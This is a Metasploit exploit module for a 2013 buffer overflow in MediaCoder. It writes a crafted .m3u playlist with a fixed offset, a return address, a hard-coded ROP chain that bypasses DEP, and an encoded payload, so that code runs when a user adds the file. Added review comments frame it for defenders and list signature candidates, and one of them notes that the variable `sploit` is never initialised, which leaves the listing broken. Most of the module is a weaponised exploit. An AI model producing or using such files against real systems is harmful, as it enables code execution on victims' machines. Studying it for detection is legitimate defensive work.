require 'msf/core'
# Metasploit file-format module: writes a crafted .m3u playlist that, per the
# module's own description, triggers a buffer overflow in MediaCoder when the
# file is added (references: OSVDB 94522, EDB 26403).
#
# Defender-relevant properties visible in this listing:
# - The output is one file (default name 'msf.m3u') padded to the target's
#   'Max' size, i.e. 5000 bytes for the only target defined here.
# - The return address and the packed chain in #exploit are literal constants,
#   so apart from the random filler and `junk` dwords those little-endian byte
#   sequences repeat across generated files and are content-signature candidates.
# - The chain uses hard-coded 32-bit addresses. NOTE(review): that presumes the
#   modules holding them load at fixed addresses (no ASLR/rebasing); the page
#   does not name those modules, so confirm before relying on it.
# - The stated tested range is MediaCoder 0.8.21.5539 to 0.8.22.5530; the page
#   does not say which release fixes the issue.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit:: FILEFORMAT

  # Registers module metadata (name, references, payload constraints, target)
  # and the FILENAME option used for the generated file.
  #
  # @param info [Hash] metadata passed through to update_info / super
  def initialize(info = {})
    super (update_info(info,
      'Name' => 'MediaCoder .M3U Buffer Overflow' ,
      'Description' => %q{
This module exploits a buffer overflow in MediaCoder 0 . 8 . 22 . The vulnerability
occurs when adding an .m3u, allowing arbitrary code execution under the context
of the user. DEP bypass via ROP is supported on Windows 7 , since the MediaCoder
runs with DEP . This module has been tested successfully on MediaCoder 0 . 8 . 21 . 5539
to 0 . 8 . 22 . 5530 over Windows XP SP3 and Windows 7 SP0 .
},
      'License' => MSF_LICENSE ,
      'Author' =>
      [
        'metacom' ,
        'modpr0be <modpr0be[at]spentera.com>' ,
        'otoy <otoy[at]spentera.com>'
      ],
      'References' =>
      [
        [ 'OSVDB' , '94522' ],
        [ 'EDB' , '26403' ]
      ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'seh'
      },
      'Platform' => 'win' ,
      # Payload constraints: at most 1200 bytes, and the encoded payload must
      # avoid NUL, backslash (0x5c), '@' (0x40), CR and LF.
      'Payload' =>
      {
        'Space' => 1200 ,
        'BadChars' => "\x00\x5c\x40\x0d\x0a" ,
        'DisableNops' => true ,
        'StackAdjustment' => - 3500
      },
      'Targets' =>
      [
        [ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0' ,
          {
            # 'Ret' is written immediately after 'Offset' (849) filler bytes in
            # #exploit; presumably that is where the overwritten control-flow
            # pointer sits - confirm against the vulnerable build.
            'Ret' => 0x6afd4435,
            'Offset' => 849 ,
            # Total size the generated file content is padded to.
            'Max' => 5000
          }
        ],
      ],
      'Privileged' => false ,
      'DisclosureDate' => 'Jun 24 2013' ,
      'DefaultTarget' => 0 ))
    register_options(
      [
        OptString. new ( 'FILENAME' , [ false , 'The file name.' , 'msf.m3u' ])
      ], self . class )
  end

  # Returns an array holding one random 32-bit value repeated n times.
  # The value is made from 4 random alphabetic characters read as a
  # native-endian unsigned 32-bit integer; Array#* repeats that same value,
  # it does not draw a new one per slot.
  #
  # @param n [Integer] number of entries (default 1)
  # @return [Array<Integer>]
  def junk(n= 1 )
    return [rand_text_alpha( 4 ).unpack( "L" )[ 0 ]] * n
  end

  # Returns n copies of a 32-bit filler dword: 0x6ab16202 when rop is true,
  # otherwise 0x90909090 (four x86 NOP opcodes).
  # NOTE(review): 0x6ab16202 is presumably the address of a no-op gadget in the
  # target process; the page does not say which module it belongs to.
  #
  # @param rop [Boolean] pick the address-based filler instead of NOP bytes
  # @param n [Integer] number of entries (default 1)
  # @return [Array<Integer>]
  def nops(rop= false , n= 1 )
    return rop ? [0x6ab16202] * n : [0x90909090] * n
  end

  # Assembles the file content and hands it to file_create.
  # Layout, in append order: 'Offset' filler bytes, the target return address
  # (32-bit little-endian), the packed chain, 16 bytes of NOP sled, the encoded
  # payload, then random padding up to the target's 'Max' length.
  def exploit
    # Chain of hard-coded dwords, flattened and packed as 32-bit little-endian
    # ("V*"). The description calls this the DEP bypass; the individual entries
    # are not annotated on the page and are left undocumented here.
    rop_gadgets =
    [
      nops( true , 35 ),
      0x100482ff,
      0xffffffc0,
      junk,
      0x66d9d9ba,
      0x6ab2241d,
      junk( 15 ),
      0x1004cc03,
      0x6ab561b0,
      0x66d9feee,
      0x6ab19780,
      0x66d929f5,
      0xfffffcc0,
      junk,
      0x6ab3c65a,
      0x1004cc03,
      0xffffffff,
      0x660166e9,
      0x66d8ae48,
      0x1005f6e4,
      0x6ab3d688,
      0x6ab4ead0,
      0x100444e3,
      nops( true ),
      0x100482ff,
      nops,
      0x6ab01c06,
      0x6ab28dda,
    ].flatten.pack( "V*" )
    # NOTE(review): no assignment to `sploit` is visible before this first
    # `<<`; as listed, that is a NameError at run time.
    sploit << rand_text(target[ 'Offset' ])
    sploit << [target.ret].pack( 'V' )
    sploit << rop_gadgets
    sploit << make_nops( 16 )
    sploit << payload.encoded
    # Pad so the final content length equals target['Max'].
    sploit << rand_text(target[ 'Max' ]-sploit.length)
    file_create(sploit)
  end
end